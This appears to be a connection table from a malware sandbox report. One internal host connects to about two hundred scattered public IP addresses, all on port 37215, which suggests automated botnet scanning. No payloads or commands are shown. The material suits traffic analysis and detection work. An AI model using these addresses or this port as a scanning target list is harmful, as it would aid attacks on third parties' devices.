                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18571192.168.2.1354036157.16.22.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18572192.168.2.13375962.17.183.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18573192.168.2.1359888124.121.68.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18574192.168.2.134862241.122.26.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18575192.168.2.134056670.117.253.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18576192.168.2.1349592157.217.250.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18577192.168.2.1335660197.79.91.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18578192.168.2.1343206197.177.254.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18579192.168.2.1342312122.8.139.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18580192.168.2.1341440157.149.85.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18581192.168.2.1344612197.155.172.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18582192.168.2.133921843.218.145.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18583192.168.2.1350316197.172.81.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18584192.168.2.1335218111.251.116.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18585192.168.2.133480041.50.47.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18586192.168.2.1360594157.131.180.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18587192.168.2.1337546186.25.42.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18588192.168.2.1356360186.37.147.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18589192.168.2.1342112157.242.253.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18590192.168.2.1344476205.117.4.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18591192.168.2.1334696103.204.103.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18592192.168.2.1355172115.206.121.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18593192.168.2.1354082141.132.108.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18594192.168.2.1337166197.222.95.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18595192.168.2.134899681.188.191.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18596192.168.2.1355932197.176.116.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18597192.168.2.1348922197.131.200.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18598192.168.2.133367886.86.237.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18599192.168.2.1346686157.77.149.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18600192.168.2.135303241.141.22.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18601192.168.2.1356496157.108.212.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18602192.168.2.1349078197.188.12.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18603192.168.2.134137841.34.21.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18604192.168.2.133367641.85.212.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18605192.168.2.1345490157.59.99.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18606192.168.2.1342074162.185.8.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18607192.168.2.1360780197.146.7.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18608192.168.2.1355480197.82.119.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18609192.168.2.1342756197.255.25.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18610192.168.2.1338714157.147.43.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18611192.168.2.135305012.213.8.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18612192.168.2.1340826107.188.15.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18613192.168.2.135467241.187.139.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18614192.168.2.1344558157.166.13.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18615192.168.2.1360728137.218.108.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18616192.168.2.135731841.91.148.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18617192.168.2.1352352217.222.21.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18618192.168.2.1342272156.116.139.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18619192.168.2.133388241.249.152.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18620192.168.2.1340574197.228.250.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18621192.168.2.1348104157.36.225.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18622192.168.2.134265641.52.127.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18623192.168.2.1342188121.62.184.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18624192.168.2.1337352157.201.59.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18625192.168.2.1350148197.70.55.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18626192.168.2.1345114206.66.180.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18627192.168.2.1340838197.167.123.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18628192.168.2.1332768197.44.71.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18629192.168.2.1359338110.253.208.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18630192.168.2.1349506157.187.244.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18631192.168.2.134693060.197.175.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18632192.168.2.1348400157.41.206.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18633192.168.2.1357464157.202.196.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18634192.168.2.133503441.11.213.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18635192.168.2.1342280157.221.203.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18636192.168.2.1339638197.177.251.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18637192.168.2.1353548197.6.204.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18638192.168.2.1335460197.252.120.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18639192.168.2.1350058157.194.109.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18640192.168.2.135291441.138.149.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18641192.168.2.1349914157.18.99.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18642192.168.2.1332824157.31.72.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18643192.168.2.133619677.128.195.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18644192.168.2.1345198168.83.51.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18645192.168.2.1339974157.229.36.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18646192.168.2.1338574197.20.45.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18647192.168.2.1356334157.99.68.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18648192.168.2.1358884197.227.119.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18649192.168.2.1339296157.69.160.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18650192.168.2.1349780197.75.215.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18651192.168.2.1338446197.186.9.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18652192.168.2.134859041.175.200.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18653192.168.2.135893664.39.119.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18654192.168.2.134907241.247.159.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18655192.168.2.1338142197.24.241.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18656192.168.2.134935441.117.47.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18657192.168.2.13349362.217.14.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18658192.168.2.1342610157.47.124.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18659192.168.2.1349596183.116.30.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18660192.168.2.1356434157.214.153.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18661192.168.2.136021441.127.56.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18662192.168.2.1351982157.15.226.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18663192.168.2.1333510157.145.154.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18664192.168.2.1347978157.174.169.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18665192.168.2.1356618197.182.239.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18666192.168.2.1340104157.251.255.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18667192.168.2.1357040157.216.8.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18668192.168.2.1337870157.108.157.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18669192.168.2.134715441.253.45.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18670192.168.2.135791041.2.173.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18671192.168.2.1351946197.161.169.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18672192.168.2.1342060157.51.149.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18673192.168.2.1343926197.173.135.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18674192.168.2.1349622197.75.88.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18675192.168.2.1334214157.153.161.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18676192.168.2.1345594197.71.95.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18677192.168.2.1335268197.4.140.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18678192.168.2.135675241.191.197.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18679192.168.2.1340392197.178.55.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18680192.168.2.1347788197.85.216.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18681192.168.2.1346622133.58.216.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18682192.168.2.1359536197.139.105.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18683192.168.2.133738041.132.131.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18684192.168.2.1343526121.237.162.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18685192.168.2.1333996104.210.156.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18686192.168.2.1357026182.201.178.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18687192.168.2.1346858197.53.90.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18688192.168.2.1343680197.169.44.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18689192.168.2.1339168157.228.7.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18690192.168.2.1351530210.6.0.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18691192.168.2.1359510178.214.16.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18692192.168.2.134120841.132.36.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18693192.168.2.1353186157.85.36.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18694192.168.2.1349350121.91.145.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18695192.168.2.135266841.242.120.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18696192.168.2.1341824157.234.96.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18697192.168.2.1340488157.133.21.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18698192.168.2.1334916197.183.145.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18699192.168.2.1346814157.184.39.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18700192.168.2.1335624142.154.233.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18701192.168.2.1360482197.182.74.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18702192.168.2.1357214197.50.14.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18703192.168.2.1350750157.239.24.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18704192.168.2.1335160197.17.245.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18705192.168.2.1335062157.175.145.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18706192.168.2.135969041.139.109.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18707192.168.2.1346550157.134.247.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18708192.168.2.1333824197.212.179.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18709192.168.2.1340630157.89.67.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18710192.168.2.1351012197.120.9.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18711192.168.2.1355316157.59.190.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18712192.168.2.134862241.135.44.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18713192.168.2.1348278197.78.84.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18714192.168.2.1338366212.140.44.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18715192.168.2.133764841.45.17.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18716192.168.2.1343462157.96.120.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18717192.168.2.1356800157.76.139.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18718192.168.2.134804420.150.54.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18719192.168.2.1348158157.248.26.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18720192.168.2.1345324197.48.192.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18721192.168.2.134997841.76.207.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18722192.168.2.1340858101.202.193.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18723192.168.2.134200441.174.167.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18724192.168.2.135382483.205.217.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18725192.168.2.135413241.156.94.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18726192.168.2.1333748115.68.26.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18727192.168.2.1342472197.144.201.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18728192.168.2.134671241.226.2.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18729192.168.2.135701041.153.52.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18730192.168.2.1355760157.158.244.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18731192.168.2.1332914197.227.81.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18732192.168.2.1342786213.89.26.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18733192.168.2.1336372197.114.186.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18734192.168.2.135461841.138.196.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18735192.168.2.134091441.119.129.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18736192.168.2.133562427.179.5.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18737192.168.2.1337534197.75.98.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18738192.168.2.135892260.39.222.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18739192.168.2.134927641.101.114.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18740192.168.2.1356728157.28.132.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18741192.168.2.1346124197.240.8.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18742192.168.2.134501841.232.75.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18743192.168.2.1337924197.225.89.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18744192.168.2.1350696166.13.228.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18745192.168.2.134350241.16.141.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18746192.168.2.1335364197.248.53.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18747192.168.2.133903641.71.70.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18748192.168.2.1347456197.180.118.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18749192.168.2.1360578157.70.180.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18750192.168.2.133599441.236.115.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18751192.168.2.1358468157.51.3.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18752192.168.2.1358002197.100.62.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18753192.168.2.135209431.128.48.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18754192.168.2.133618041.215.9.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18755192.168.2.135940841.220.24.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18756192.168.2.1332776138.232.78.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18757192.168.2.135258241.122.97.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18758192.168.2.134238471.218.22.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18759192.168.2.1333870157.88.3.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18760192.168.2.134089841.110.137.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18761192.168.2.135530441.207.181.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18762192.168.2.1355838160.139.80.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18763192.168.2.135476841.31.58.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18764192.168.2.133396441.209.184.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18765192.168.2.133494841.32.122.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18766192.168.2.134529631.212.127.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18767192.168.2.133960641.132.113.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18768192.168.2.135348641.131.218.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18769192.168.2.135715441.8.191.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18770192.168.2.134700841.8.27.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18771192.168.2.1341416151.147.62.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18772192.168.2.1344902197.200.124.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18773192.168.2.1338880197.3.121.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18774192.168.2.133577677.124.206.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18775192.168.2.1356026197.200.124.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18776192.168.2.1358302113.226.171.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18777192.168.2.1355824157.71.178.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18778192.168.2.1349464112.225.8.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18779192.168.2.135577841.108.33.14537215
                                                  TimestampBytes transferredDirectionData


